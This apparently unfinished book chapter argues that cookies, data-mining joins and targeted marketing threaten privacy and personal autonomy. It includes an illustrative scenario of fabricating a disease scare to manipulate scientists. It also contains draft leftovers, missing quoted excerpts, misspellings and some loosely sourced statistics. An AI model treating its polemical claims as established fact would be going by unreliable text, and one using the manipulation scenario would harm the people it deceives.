"First Understand How Bad It Is"
And all that the Lorax left here in this mess was a small
pile of rocks with the one word…
“UNLESS”
Dr. Seuss, The Lorax
The Illusion of Privacy
On May 22, 2002, before the spyware epidemic began in 2004 and long before the mass deployment of botnet nodeware, an interesting debate arose at the Check Point User Experience event in Dublin. The issue concerned network intrusions of home computers that are connected to cable modem or DSL lines. “I think every single user at home gets 200 attacks every day,” said Gil Schwed, Check Point’s CEO. That contrasted with commonly accepted data, which suggested at the time that the correct average figure is ten attacks per day. Only ten attempted trespasses into our homes by unknown strangers every day!What accounted for the difference? According to Aaron Goldberg of Ziff Davis Market Experts, “The ‘200 attacks’ remark was based on the numerous alerts users see after they install a firewall or intrusion detection system. If all these were malicious attacks, it would require a hacker community much larger than is believed to exist, running multiple port scanners. In reality, many of these alerts are sites scanning for cookies rather than attacks—a privacy issue but not one to panic over,” said Goldberg.
Our home computers were being intruded upon typically 190 times a day, but that’s merely a privacy issue and therefore nothing to worry about. Furthermore those intrusions are not just bored individuals poking around; they represent an organized search for information in our cookie files. In other words, they are digging for information about what we do with our lives, what we purchase, what sites we visit, even perhaps whom we correspond with. But they’re not “malicious attacks.”
Steven J. Schugart Jr., commenting about intrusive advertising in Network Computing, notes that
More disturbing is the spyware and usage-tracking cookies used by vendors. In my role as technology editor, I do a lot of research on the Web, bouncing from site to site. Because of the illegal Trojans used by too many sites, I have had to invest in a program called Ad-Aware by Lavasoft. It sweeps my system for known spyware and usage-tracking cookies. Take a look at the demo version and run it on your system. You will be appalled.
Some of these infractions are so egregious that my antivirus program picks up on them. The use of such tactics is tantamount to theft of services . . .
And consider this: As our privacy rights melt away in the heat of our patriotic fervor, companies are going to use the FBI’s continued efforts to invisibly monitor our cyberactivities as a shield. I can already hear the spin: “Our software is considerably less intrusive than the FBI’s Carnivore and Magic Lantern.”
And why would such an intruder stop with cookies? If they’re going to poke around without permission, they might as well look at our schedules, contacts, and perhaps search our word processing and mail files for the occurrence of select words and phrases.
Much has been made of the FBI’s Magic Lantern program, which captures keystrokes of people whom the FBI wants to monitor. The keystrokes of greatest interest, of course, are those that make up encryption passwords.
Magic Lantern has been compared to commercial key loggers such as Ghost, but there are two big differences between Magic Lantern and key-logging software. The first is that Magic Lantern is propagated as a virus. The FBI is in the business of planting viruses in the computers of those whom it wants to monitor, viruses that are sent via the time-honored method of infected email. The second difference is that key-logging software is a product, not a practice. It is not evil in itself—parents may legitimately need to know what’s going on in their young children’s chat sessions. But key logging can also be used by a thief to snag an online banking password. How it’s used determines the product’s legitimacy.
But there’s another side to the story. Before we condemn the FBI, and for that matter all in law enforcement who snoop on online communications, consider what they are up against. Global village communications facilities have made the job of the international wholesale drug trafficker or terrorist or identity thief much more efficient, and encryption ensures that those communications cannot be read by others.
The fact is that the U.S.’s FBI, Secret Service, NSA, CIA, ATF; the UK’s SOCA, MI5 and GHCQ; Canada’s CSIS; France’s DGSE; and numerous other agencies must be able to snoop when the situation legitimately calls for it. Consider the very unsettling possibility, or perhaps probability, that a plan for use of a suitcase nuclear weapon in a major city is being discussed in some online communication right now. Even the most strident privacy activists would not want to categorically deny the right of law enforcement to intercept that communication.
Often the abridgment of the rights of suspects is cited as a dangerous Information Age phenomenon. In fact Thomas Jefferson himself acknowledged in his pursuit of members of the Burr/Wilkinson conspiracy that the liberties of unconvicted criminal suspects must of necessity be compromised. In a court of law, Aaron Burr was considered innocent until proven guilty. That didn’t stop Jefferson from intercepting Burr’s written communication and interfering with his freedom of movement in order to have him brought to trial (where he was acquitted).
The good news is that we have a means of reducing abuses of such powers, while at the same time solving a serious problem for law enforcement. That solution is based upon something that is viewed by many as the antithesis of privacy: the universal ID. We will show, however, that a combination of a properly designed universal ID system, with a PKI built upon a properly designed and governed certification authority, is actually our greatest hope for truly meeting the long-articulated goal of allowing individuals to keep control of the use of information about themselves. If we are to have such control, we must have a place from which to exercise it. Properly designed, a unversal ID system can be a bulwark of our privacy rather than an eroder of it.
A reliable, universal identity credential gives us a means by which the use of police powers in monitoring online communication can itself be monitored and limited. Later we will give the specifics of the Law Enforcement Infrastructure, one of the twelve components of the Quiet Enjoyment Infrastructure. The Law Enforcement Infrastructure accommodates both the need for privacy and the need of law enforcement to monitor communication among those whom due process permits to be considered suspected criminals. Most importantly, it allows law enforcement to do its job while providing a means to ensure that the power it conveys is not abused
But let us not allow the issue of government ability to monitor communication among suspected criminals to distract our attention from the activities of those who have already succeeded in knowing much of what everybody is doing and have furthermore learned how to use that information to influence the decisions of huge numbers of people.
Your Choice
Privacy activists often focus on policy for organizations that allow themselves to be governed by policies. While they’re busy doing that, an assortment of “cookie clubs” that laugh at the notion of privacy policies dig through the files that reveal the details of our lives. Your cookie files are much more valuable to nosy organizations than are utterly unnecessary pieces of “index” information, such as your social security number.Will you control your own life? It’s a simple, binary choice—yes or no. There are no shades of sort-of or almost to mitigate the starkness of the choice. This is all or nothing. If you don’t act, then ask yourself, who will be in charge? Will it be a monolithic entity more frightening than anything ever conceived by George Orwell?
Who Will Control Your Life?
You may think that’s overly dramatic. After all, the subject is privacy. We’re only talking about information, right? The junk mailers and others who use information about you don’t control your life, do they? Surely they just add an element of annoyance to it. Besides, a growing awareness of privacy concerns will result in meaningful privacy policies and laws that govern the intrusive activities of the companies involved and the use of their databases, won’t it?The answer is that this is about more than annoyances. To begin with, it’s about access to the most intimate details of your life. On a more sinister level, it’s about the ability of those who have information about you to manipulate and control you.
As a solution to the particular problem described in this chapter, privacy policies and laws are as meaningless as would be a law prohibiting the AIDS virus. Let’s look at some of the difficulties presented by technological innovation that prevent quick and easy remedies.
What Law?
Right now gambling operators and pornographers operate websites on servers in various Caribbean islands and third world countries. Their services are offered to any users, including American citizens, who come across their site. But everything about the service and the transactions takes place offshore, using a foreign banking system to process credit card transactions. Unlike old-economy crooks, who set up false offshore addresses for illegal activities that really take place in North America or Europe, the operator of such a website is established in the third world host country.If the website operator happens to make his or her services available to anyone with a computer or wireless information appliance, regardless of location, then it is the user who transgresses, not the site operator. By anyone’s standard, the operators are governed by the law where their services originate, not by the law in the venue of some remote user. And what if their host nation changes its view of such matters? That’s easy, if one third world government decides to crack down on offenders, a backup server in another developing country can be ready to take over in a heartbeat.
We all know that Internet traffic and activity knows nothing about national boundaries. Why then, when it comes to policy and regulation, do our discussions assume that governments and legislation are of any relevance?
What Company?
Companies have charters, officers, boards of directors, and balance sheets to which they are held accountable. Most companies will bend over backward to avoid putting their assets and officers and branded reputations at risk. But what happens when a middle manager at one of those companies is under pressure to improve his unit’s performance? And what if he discovers an unnamed club, devoid of physical location or membership roster, where he can barter his customer information for information from unnamed other sources and thereby get the advantage he needs in order to make his numbers? When the pressure intensifies, the trade will take place.
There is a famous story about IBM approaching the owners of the Apache open source Web server software product, which IBM wanted to use as part of its WebSphere product. Hard as it tried, IBM could not find the company that owned this market-leading product because no such company existed. Apache was developed by a club, a group of people dispersed around the world, many of whom had never met one another. There was no legal entity for IBM to negotiate with. This is how open source development typically works; in this case, it is a club with clear visibility and nothing to hide—a marvelously productive gathering of some superb developers.Expect to see a proliferation of such clubs. Know that for every such club that has clear visibility and nothing to hide, others exist with no visibility and plenty to hide.
When he was chief executive officer of Sun Microsystems, Scott McNeilly famously called consumer privacy issues a red herring. “You have zero privacy anyway. Get over it”, he told a group of reporters and analysts in a January 1999 event to launch his company’s new Jini technology. Under pressure from privacy activists, MeNeilly has since backpedaled in his public pronouncements. What are the chances that this powerful shaper of information infrastructures has really changed his mind and his values? How many of his less-outspoken peers think and say similar things when they’re safely away from the microphones?
The answer can be seen in their naïve and carelessly constructed identity schemes. If we are to have privacy then we must be our own grassroots engineers of our privacy systems. We’ll get no help from the McNeillys.
What Databases?
Two or more big, costly, established customer databases with the finest government-regulated corporate pedigrees and privacy statements can mate, in the middle of the night, on a server on some Asian outpost, producing a “join” that is not accountable to anybody.Most “data banks” are collections of tables of information plus some procedures for using them, collectively called relational databases. A “join” is part of an operation that finds records of interest from two tables, using specific criteria.
Joins are ephemeral—they happen and then they vanish. Their progeny is a bit of combined information that then might be part of another table. That table, after perhaps mating with another dozen or so products of such joins around the world, might start to form a very revealing picture of a person or organization or other entity.
Joins are fun to play with and can be immensely powerful. Tracking down their source can take months and years of intelligent sleuthing, during which time another few thousand generations of joins have come and gone and wreaked their havoc. Databases are meek; joins are powerful.
Law, organizational accountability, and nicely bounded and identifiable collections of information are comforting concepts when our privacy is threatened as it is today. But these concepts, as they are typically invoked by those who comment on privacy issues, can be meaningless. We’ll see that:
Instead of useless legislation, we need new applications of existing intellectual property law that are reasonably enforceable across national boundaries;
Instead of useless privacy statements and impossible enforcement challenges, we need to claim our information as our property and treat those who steal it as thieves;
Instead of looking for abuse of our information while it’s at rest in databases where it appears to be fairly well cared for, we need to track it down as it’s dragged around the seamy hangouts of the tabular sex trade. We should regard our personal information as an abducted daughter.
Mass Manipulation
Invasion of privacy is an “in” topic these days. The standard concern seems to be how to prevent annoying and unsolicited mail. At the other end of the spectrum, journalists, companies, and individuals are expressing their concern about preventing disclosure of personal medical and financial information. But the consequences of loss of privacy do not stop with privacy loss itself. That’s just the first step. Industrial psychologists know that if I can know enough about you and I have some access to your perceptions, then I can control you.How vulnerable are we humans to manipulation? Can we be made to do things we would never do of our own accord? On a mass scale, history shows that the answer is yes.
How did the Third Reich come to power and get the German people to acquiesce to its unbelievably inhuman agenda? Did a psychopath named Adolf Hitler find a capable and amoral propaganda minister who could inflame the masses? Or did a master manipulator named Josef Goebbels go in search of a convenient psychopath to implement his plan to leverage some emotional capital—Germany’s residual national psychological instability—after the First World War?
Practitioners like Goebbels used new kinds of media to move masses to act on their basest feelings of national anger. Goebbels and the media industry of the day believed that it was impossible and unnecessary to shape the perceptions of single individuals. Rather, one had to send out messages to be digested by millions of people at a time. Today in democratic, developed, happy consumer–driven cultures such as ours, mass media is used to move masses to believe in the necessity of food processors and the notion that one’s personal identity is defined by the purchases we make: a BMW, Prada shoes, an SUV, an IKEA chair, an Armani suit, a Madonna CD, an NSync Spiderman action figure . . . one only has to sit down for 139 minutes of the film Fight Club to feel the degree to which we have truly become products of our times.
The junk (paper) mail industry shares many of these mass-media beliefs. But they have been attracted over the last few decades by the tantalizing results of what has been called database marketing. Database marketing started out as a way to make mailings more effective. A company would send out mailings with, say, four different messages and three different offers on a few different days of the week to names on a half dozen different lists, with different “selects” from each list. With the tools of a relational database, one could quickly discern which combinations produced the most successful mailing.
As the science of database marketing progressed, and the intersections of the growing number of tables became better understood, marketers were able to come closer and closer to their ideal of being able to mathematically predict the probability that, given certain things affecting your perceptions, you would behave a certain way.
And now, the more forward-thinking direct-mail experts look to the day when behavior is tracked, predicted, and manipulated on a “list” containing only one name. Based upon a detailed knowledge of a person’s past actions, a piece of mail could be so targeted to that individual that it would strike precisely the nerve it had to for a response.
This, in fact, is the goal of “one-to-one” marketing. First described by Don Peppers and Martha Rogers in their book The One to One Future, one-to-one marketing’s goal is commendable: to provide each and every one of a company’s customers with the kind of personalized service that one would expect from a shopkeeper down the street in a village where one had lived for years and where one’s preferences were well known.
As long as we personalize the phenomenon in that way, it’s a wonderful idea: Old Mr. Peebles, who runs the village bookstore, knows I like Grisham novels. When a new one comes out, he makes sure there’s a copy reserved for me and that I know about it.
But it’s not old Mr. Peebles, it’s a software robot at Multimegamedia Ltd. The software robot does “data mining” on many tables in many databases about me. The software robot does not know me and does not want to know me. It does, however, want to get better and better at predicting what I will do, given what I’ve done in the past and what Web pages and other information guided my perceptions before I did those things.
Multimegamedia has a strong privacy policy statement, which one would assume limits it from sharing information about you. Not so fast. Multimegamedia also has tens of thousands of “partners,” and their partners have partners, who run clubs and clearinghouses, and they know precisely how likely I am to passively accept their monthly book selection rather than make the effort to select my own. (Those are very valuable data to a marketer.) They also know everything my cable TV company knows about me; they know what TIVO knows about what television shows I have watched; which of those I consider important enough to record; and, for that matter, they have access to the times and dates and locations of all my credit card transactions; and so much more.
Multimegamedia, technically, does not share data with “others.” The uncounted numbers of attempts to contact you by phone or mail or email or pop-up window to get you to do something will not come from outsiders with whom they have shared data. No, they will come from subsidiaries and partners. And if you will look closely at paragraph 156(Q)33, you will see that the privacy statement clearly says that sharing information about you with their partners is not really considered sharing at all. (Oh by the way, the state turnpike authority, which must record your comings and goings in order to bill you correctly for the use of your toll-pass device, is a “partner” of Multimegamedia.)
In implementation, we see one-to-one marketing take forms where, for example, an online retailer knows with a fair amount of certainty that a given customer has never seen a particular price on a product, and that the customer has shown a propensity to pay a high price for similar products. Instantly, a “special” (high) price is created just for that customer.
Online implementations of the one-to-one methodology don’t have to take forms that invite manipulation of users. If you marry the concept of “opt-in” marketing with one-on-one, you could have the best of both worlds. Opt-in refers to the practice by which a consumer explicitly enables access to their personal information to marketers whose products have interested them. The value of this approach exists only if the marketer is restricted to information about you that is accessible to you, information that is genuinely under your control. And in fact that can be done, using methods described later in this book. The methods are not naïve—a marketer can sustain a business with them.
Traditionally, marketing databases had been built upon information about responses to mailings. These responses will not define an individual beyond a certain point. But if you augment the information with a detailed record of the websites visited by the individual, where on the Web and in the physical world they have used their credit card, and other easily retrieved data, you start to get a more detailed picture of the person. Data acquisition techniques get more comprehensive and more powerful all the time. But the real break from the limitations of mass media comes not with data acquisition but with the interpretation of the data.
In the old days it took an experienced and intelligent human being to analyze data about you and make predictions about your behavior. (“If I send him information which alters his perception in such and such a way, he will do such and such a thing.”) Now, software makes the process of pattern recognition considerably faster and vastly more economical. The software can analyze the patterns of a hundred million people almost as easily as it does a single person. Where the human mass marketer might come up with a few dozen profiled categories of people that the hundred million fall into, the software robot can come up with a hundred million profiles and a hundred million sets of directions to other robots, each of them saying, “This person has been exposed to this and this information and has done such and such in the past; if you present this further information on these three dates, there is an 87% probability that the person will do what we want him to do.”
This view of the privacy problem is based on the knowledge that every human being’s behavior can be manipulated if you know enough about the person to control his or her perceptions—nobody is immune.
Professionals in the intelligence community must know that this applies to them too, because control of perceptions is one of the essential tricks of that trade. Advertising professionals know that they themselves are vulnerable to the efforts of their colleagues—Advertising Age magazine is full of advertisements, directed at professional advertising magicians who certainly know the power of perception control.
For the most part, though, people who are not in the business of manipulating perceptions tend not to recognize their own vulnerability. We all want to believe that as rational human beings we are not susceptible to thought control. “That’s for the masses, not for me,” says every member of the masses. A simple test reveals the truth: only those who are never fooled by a magician can make the claim that their perceptions are not subject to manipulation. Have you ever been fooled by a stage magician?
Don Peppers and Martha Rogers, The One to One Future: Building Relationships One Customer at a Time (New York: Doubleday, 1993, 1996).
An Example of Modern Media Manipulation Magic
Let’s say I want to chop down ten thousand acres of forest. Four thousand individuals live in the area affected. Five hundred individuals appear at the intersections of some tables that define people who make decisions about the use of forests in the area. Twenty people at the intersections of these groups have credentials in the life sciences. One of the objections to cutting down the forest has been the destruction of the habitat of a certain mammal.Now, can we find (or concoct) evidence that the mammal in question is a host for the deer tick that causes, say, Lyme disease? Can we orchestrate a series of communications to manipulate the perceptions of those twenty life scientists and frighten them into thinking that we have a deer tick epidemic on our hands?
Certainly we couldn’t do that with old communication tools; the effort would be clumsy and obvious. Certainly we can by deftly using today’s database and targeted communication tools. We simply have to make a series of pseudo-facts appear as though they are coming from legitimate sources.
But the challenge is not just to find the twenty life scientists. That’s old hat to database marketers—it’s been done for years. No, the very special challenge is to come up with the answer to the question, “Now that we have identified the twenty people we need to influence, how do we find all of the sources of information used by these people?” By discovering the sources they consult to form their opinions, thought control becomes more and more possible. Once they have been converted, they will influence their neighbors.
If the story of the epidemic were to come from anyone else, its credibility would be less than the strongest possible. Instead, the story of the epidemic will arrive at the journalists’ doorstep from the mouths of concerned local life sciences professionals, not from the PR machine of the greedy paper company that wants to tear down the forest. The result? In the eyes of the public, the forest, if left standing, will go from a source of inspiration to a tainted, troubled, infested wasteland—one of those places you need to keep your kids away from. That alone won’t make people want to cut it down, but it will be enough to limit the support for those who oppose the cutting of the forest. Mission accomplished.
Orwellian Joins
When a skilled writer like George Orwell builds a plot around an evil entity, he personifies it. He gives it a name. After all, how can a villain contribute to a plot if he cannot be vilified in a reader’s mind?It is hard to be passionate about a database—hard, that is, if you don’t have one. But some people have a piece of a database that is part of a powerful source of control over the lives of every human being in the developed world. And as Lord Acton observed, “Power corrupts; absolute power corrupts absolutely.”
Real live human beings are at work building this immense source of power. It is not the Internet. It is not, in the lexicon of technologists, a database. But in the lexicon of lexicographers the term database really means something broader than its narrow use in technology jargon:
Database, n.: an organized body of related information
A library filled with shelves of books all related to a particular industry or academic discipline is a database. A collection of tables all related to a particular thing is a database. If you’re not familiar with databases, you can still easily understand what this is all about. Start with a “table,” which is just what you think it is: information arranged in rows and columns.
Technologists often use the same word “database” to refer to two different things: (1) a collection of tables of information and (2) the software that manages those tables in order to sift through information—perhaps about you—and compare and merge it with information from other databases. To be accurate, though, the latter is a database management system, not a database.
But the real definition of the word “database” tells us that a collection of hundreds of thousands of cells in tables about you, housed on different servers in different parts of the world using different operating systems and different management systems is, in fact, one database about you.
The technical term for information about you is PII—“Personally Identifiable Information”:
The concept of PII—the idea that data belongs in a special class when it is tied to an actual, identifiable human—is especially helpful when we try to come to grips with questions involving privacy, technology, and commerce. PII is like uranium: quite valuable, but more than a little dangerous when it falls into the wrong hands. It has become so important that Wall Street analysts are valuing some companies based on the quantity and quality of their customer PII profiles; privacy advocacy groups and governmental regulatory agencies around the world are closely monitoring PII collection and use, and considering a staggering amount of new legislation; software developers are reengineering their products to become “PII-compliant”; even new sniffers (the network analysis tools used by software engineers and hackers) are in the works for the express purpose of tracking PII inside large information systems. Yet most users of the Internet, even active ones, have very little idea what PII is, how it is collected, where it is stored—or even why it is important.
At an e-business conference at the former Fleet Bank in Boston, a concerned statistician cited a medical study of the residents of Cambridge, Massachusetts, to show how revealing just one table can be. In response to concerns about protection of the privacy of the subjects, the study’s author noted that while he had privileged information on the medical backgrounds of almost all residents, all names and addresses were deleted from the records—“only” birthdates were left. The statistician then noted that in a random sample of 100,000 people, 12 percent have unique birthdays. If I have only that one table, and I acquire the city’s public voter registration records, a simple sort lets me know something I should not know about the medical backgrounds of the voters among those twelve thousand people. And more tables are always available.
The database about you is very, very large. It includes information about where you used your credit card last night, what you bought with it, where you clicked on the Web, what you downloaded, what books you bought, what cause or political party or charity you contributed to. Don’t worry that the tables are not linked right now. When someone needs to link them, they will be linked. It is not, as they say, rocket science.
Try it yourself on the database management system in the office suite software on your computer. Look for Microsoft Access or its equivalent. Create some tables and see what you can do with them. (This is a very worthwhile activity, because knowing how a database works is this century’s equivalent of knowing addition and subtraction. It is much more important than knowing about “computers.” You can know very little about computers and get along just fine as long as you know how to use a relational database and a few other things.)
The Sex Life of Tables
Stephen Hawking
If computer viruses count as life, they are primitive, asexual organisms. Table joins like the ones discussed here can constitute a more highly evolved, sexual, and potentially more powerful life form.
At this point I would love to cite statistics about how many tables around the world contain information about you. A more important figure would be how often those tables mate with each other to generate relational DNA for infant software robots whose only role is to know what you are likely to do next and how that event can be influenced. Unfortunately, there is no way to get that information. The sex habits of relational databases are as private as privacy policies are public. You and I will probably never know.
Daddy, Where Do Baby Tables Come From
When we fill in a form or a directory or a database table with information, we use the verb “to populate.” We populate a database. That curious choice of terms was made long before there was tabular sex to write about, so someone somewhere was remarkably precient. Prescience aside, we should spend a little time learning how these tables of information about you come into being. Where does all that information come from?We’ve mentioned one source of course: the “lost” or “stolen” laptop that contains a duplicate of a corporate database with millions of customer records. Others include the following (this list is far from exhaustive.)
Sharing Cookies
Open Pit Mining
Phishing
TIA-ing
Parasites
Harvesting Visited Links
***The following sections must be rearranged
Open Pit Mining
The profession and sport of data mining is all about seeing what happens when tables are made to intersect with one another. Data miners don’t want to know one little thing about twelve percent of their sample. They want to know everything about everybody. And isn’t that just how people are? People are nosy, and people like power. The sport of data mining serves both impulses. Add to that the sport of “target marketing,” which started out innocently enough but which has come to mean “control of perceptions of individuals,” and you have information power in spades.The power of these techniques can be difficult to grasp if you have never fiddled with database tables. It’s natural to think that the main reason to be concerned about privacy is a desire to reduce the amount of intrusive marketing messages coming at you.
Look again, closely, at this section of the excerpt from the Fena and Jennings book:
What accounts for that characterization of the power gained by ownership of personal information? Why are collections of PII so valuable? After all, anybody can rent a mail list. What makes it dangerous?
It is dangerous, of course, because it can be used to manipulate our perceptions.
It is essential that we take measures to neutralize the threat to our privacy, to our very autonomy—our ability to inform ourselves and make good choices for our families and ourselves. The good news is that it is quite possible to solve this problem and to solve it without spending great amounts of time and energy reading privacy statements and advocating for protective legislation. The solution is the Quiet Enjoyment Infrastructure—QEI—described in this book.
Later we will discuss other digital life forms. Let’s hope they don’t cross-breed.
Cookie Clubs
An Internet “cookie” is not a dessert but a piece of information planted in your computer by a site you visit. Cookies can be very useful not only for the site but for you as well, providing among other things a kind of session-like continuity and connectedness in the otherwise “stateless” Web. When discussing the benefits of cookies versus their potential for erosion of privacy, technologists and journalists tend to focus on the cookie as a record of a user’s activity separate from other records about that person. Viewed that way, cookies are typically fairly harmless.But why would we view them that way? Even if the typical plan for the use of cookies is not overly intrusive, should we not be more concerned about the less common, much more intrusive use of cookies? Most fissionable nuclear material is produced to generate electric power. Does that mean we needn’t concern ourselves with the lesser amount that is headed for some other purpose?
In fact, an Internet cookie is something so insidious that its very name reveals the cynicism of those who perpetrated it. You can just hear the big-brother-wannabes in the meeting room of their cabal (comfortably removed from the Internet highway, to be sure). Picture a mad scientist in a dark castle asking his assembled sycophants, “What can we call this snooping device that will make it sound innocent? Mom? Home? Nah, they’re too obvious, people will start to wonder. Wait, I’ve got it! Cookie! What could be friendlier and homier than a cookie? Yet the connotations aren’t so obvious that the word will cause people to stop and think what we’ve got up our sleeve….”
A cookie is a piece of information that is written into your computer by a website for the purpose of tracking your activities.
What happens if I collect information on you by means of cookies and share that information with another party, say, a credit card processor, in exchange for some reciprocal sharing, and the two of us have similar relationships with others in a chain that includes thousands of companies and nonprofit cooperatives, such as credit bureaus? The result is a loosely unified record of everything you do, every place you go, and anything you buy.
But it’s more than that. If you express yourself by contributing to a cause or a political party, does that information make it into the Cookie Club? Of course it does. In many ways this database about you is a record of your thoughts as well as your actions.
Information can be collected without cookies. Cookies just make it so much easier. Let’s say a particular computer is used by an adult and a child. The adult visits a site and responds to an offer of personalized items for the family. The adult fills in a form, providing name, address, phone number—and perhaps the child’s name. The site also places a cookie. Later, the child goes to an apparently unrelated site to play games and grab some images of dinosaurs to use in a graphics program like KidPix. That site also places a cookie.
Well, it turns out that the two sites are owned by two cooperating companies. It’s true, if you examine the cookies they are only feeding information back to the server that placed them. After the two cookies are placed and the information is gleaned, a very simple little program operating in the back room of the company or companies that run the servers adds one and one together and easily builds a record about that child and her family.
Now, there’s nothing preventing the organization that placed that cookie from adding that snippet to a database of thousands of such snippets about you. There is nothing preventing groups of such organizations from sharing such databases of snippets to put together an even more complete picture of you, your habits, your desires, and your most personal secrets. Let’s face it, if I know when you go online and what you do while online, I can use that information to exercise a startling level of control over your life.
But why assume just two sites? Picture a hundred sites cooperating to build that database. Pretty soon a bunch of meaningless stray cookies have produced an intimate and detailed profile of every member of your family.
The threat to your privacy is not a database as technologists and privacy activists define it. Rather, the threat to your privacy is the intersection of tables from many databases. True, each of the contributing tables is compiled and owned by an identifiable organization that can be held accountable. But nobody owns the place where all those tables intersect. That place is the lair of the monster that wants to devour your freedom.
Poisoned Cookies
Think for a moment about the implications of the cookie trail your children leave behind. Deirdre Mulligan, Staff Attorney for the Center for Democracy and Technology, reporting in APSAC Advisor, notes that:The ease with which children can reveal information about themselves to others—through the click of their mouse, or through participation in games, chat rooms, penpal programs, and other online activities—raises concerns. As a child ‘surfs’ from one website to another their movements leave behind a trail . . . these interactions often occur without parental knowledge or supervision. This has particularly troubling ramifications for children’s privacy. The Federal Trade Commission‘s Privacy Online: A Report to Congress delivered to Congress in June 1998, detailed some troubling practices by commercial websites targeted at children. They found that while 89% of children’s sites were collecting detailed personal information from children, only half had an information practice statement of any kind, and fewer than a quarter had a privacy policy notice. Only 7% of sites collecting information from kids notified parents of the practice, and only 23% even suggested that children speak to their parents before giving information.
Sites targeted at children tend to be costly because they have to be extremely intuitive, graphical, and responsive. They must include a lot of interactive items like games to capture and keep a child’s attention. They tend not to be amateur productions put together by people without the awareness or resources to consider things like privacy provisions. In other words, the stealthy nature of kids’ sites is quite intentional.
Let’s assume that the operators of such sites “only” want to build databases of information about your child so that they can exercise an unprecedented level of control over his or her perceptions, i.e., mold the thinking of a customer to be permanently profitable for decades. Let’s try to assume that none of them—none of the thousands of such sites—ever stoops to selling such information to organizations such as Boylove, which advocates for the “rights” of adults who want to have sex with young boys.
That is as much as to say that none of the owners of those sites ever gets into a financial situation where they need new sources of cash badly enough to do things they wouldn’t do otherwise. In fact, experience tells me that more than one of those sites will succumb to pressure to sell information to unethical organizations. Perhaps it’s already happened.
Let’s say one of those is a genealogical site: a complete network of families and family members, including the very interesting mothers’ maiden names. As you probably know, one’s mother’s maiden name is a standard data item used to validate the identity of someone calling customer service when they’ve forgotten a password. If you can come up with the maiden name of the mother of the user, you can reset the password.
The formal cookie establishment has come under some scrutiny and has changed its ways a bit since the following was written:
To summarize, although surfing the web feels anonymous, it is not. The technology underlying web browsing makes it possible for web sites to collect varying amounts of personal information about each user of their sites without consent. The TRUSTe Project, a joint effort by the Electronic Frontier Foundation and CommerceNet, proclaims a first principle of Internet commerce:
Informed Consent is Necessary — Consumers have the right to be informed about the privacy and security consequences of an online transaction BEFORE entering into one.
Current technology violates this principle. However, the Anonymizer provides a partial solution.
What the Cookie Establishment Has to Say
If you inquire about cookies from the cookie establishment, they will tell a wonderful story.“You can turn them off.”
Well, why didn’t you tell me they’re there in the first place, and why didn’t you tell me how to turn them off? And what happens if I turn them off? Does my computer still work?
“Yeah, sure, but I wouldn’t bother because they’re innocuous.”
It is a matter of opinion whether you can still be productive with your computer in the age of the Web if you turn your cookies off or if you choose to be notified each time a cookie is placed in your computer. Choosing to be notified when cookies are placed will slow you down to a crawl. And it is true: most cookies would be innocuous if they existed only by themselves.
Can you see the brilliantly devious design here? Let’s say you turn cookie notifications on. Every other time you click, it seems, another cookie message pops up:
XYZ.com would like to place a cookie that will only be read back to itself and will last two days.
Set cookie?
And so you say, yeah, sure, what’s the harm of this one. And the next dozen times you click the message is about the same, nothing alarming.
Every day, every time you use the Web it’s the same tedious thing—get message window, click to permit a harmless cookie or click to not allow it. If you don’t allow it you may not get to see the page you wanted to see, so you generally let some mysterious robot set the cookie and be done with it.
The process gets tiring. After awhile you turn the cookie notifications off. You may feel a little uneasy about doing that, but those cookie notification windows just drive you nuts.
I don’t know anyone who keeps cookie notifications active permanently. No one can stand them. That’s why people would miss the one-in-five-hundred messages that says something like:
All members of the Information Associates consortium will have access to this information. About the only person who won’t know a thing about this is you. You see, we bombarded you with notices about harmless cookies on the pages before you got here. If that worked as it has done with so many other people, you probably have turned off your cookie notices and so you probably won’t even get to see that we’re doing this, you poor chump. But just in case:
Set cookie?
Would you know how to find such a cookie on your computer? It takes a bit of patience. The very few cookies that are dangerous in themselves are buried in mounds and mounds of what would seem like harmless cookies. But then, as we have seen, even the seemingly innocuous cookies are dangerous when all the nearly meaningless snippets of information about you and other users of your family’s computer are assembled in one much larger database record.
One thing you will probably find at the beginning of your cookie file is the following:
Wow, a generated file! With a warning and an exclamation point! Look out kids, don’t touch that one! Perhaps in future versions they’ll take a cue from the video industry and include an FBI warning. After all, they don’t want you tampering with this file containing detailed information about the online habits of you and your family. That’s their business, not yours.
When I first began writing this, users generally didn’t know about cookies. By 2005 that had changed. The wide acceptance of programs like Ad-Aware have brought a great deal of attention to the phenomenon of cookies, especially what have come to be called “tracking cookies” or “persistent cookies.” These are the cookies that persist from session to session in order to track your website visits;. “Session cookies,” which help keep track of things like shopping cart contents for the current session only—are generally perceived to be less dangerous.
People are beginning to be careful not to indiscriminately allow any kind of cookies to be planted on their machines. But the cookie clubs need not despair, as plenty of techniques have been developed to secure the “benefits” of tracking cookies even in the computers of users who delete them. However, published techniques generally replace session cookies rather than tracking cookies. They include the “query-string” approach, where an agile server generates a unique URL that actually contains an instantly-generated session ID (sites that care about security will hash the session ID with the IP address of the user); using a feature of Microsoft’s IIS server to similarly disguise session information in the URL; creating a hidden form on every page of a site, with automatic hidden information filling the form each time a new link is clicked; and by hiding session ID information in a JavaScript hidden frame.
Why do we find published only the alternative techniques for session cookies, while those for tracking cookies are not published? The answer is that the use of cookies to track users from session to session has achieved the status of due process: If you put the information in the cookie file then you have effectively disclosed what you are doing to the user; if you plant files somewhere else on their computer then, well, you’re pretty much doing what propagators of parasites and viruses and worms and other malware do.
Charles Jennings and Lori Fena, The Hundredth Window: Protecting Your Privacy and Security in the Age of the Internet (New York: Free Press, 2000), xvii.
“Protecting User Privacy on the Web,” by Justin Boyan, CMC Magazine, September 1997.
Let’s Say You Do Turn Cookies Off…
As “nontechnical” (whatever that means) people get more familiar with their information appliances, they tend to learn about things like cookies. Those who feel that the “session persistence” offered by cookies—the convenience of having personal information retained from session to session—doesn’t outweigh the damage to privacy can and do turn them off.So what’s the response of the cookie clubs? Respect the wishes of those who have made an explicit choice to value privacy above convenience? Display a message politely stating benefits and asking them to consider?
Of course not. What do you think this is—civilization or something?
Site operators deal with cookie blocking by looking for ways to subvert the intentions and decisions of those who stubbornly refuse to hand over personal information about themselves. If the user won’t give it, they look for ways to steal it. They are helped in that effort by the vendors of server and client software. The resulting methods are typically passed around in IRC (chat) sessions and at conferences, but occasionally they surface in publications, as in this Builder.com article:
You shouldn’t rely strictly on cookies for functionality. For example, what happens if your Web application is viewed through a wireless device that doesn’t support cookies or is viewed through a pre-HTML 2.0 or text-based browser? Another possibility is that your audience may be using cookie-blocking technology to protect their privacy.
Protect their privacy? Those meddlesome users have some nerve messing with our property—that is, our information about them!
To reach the widest audience possible…
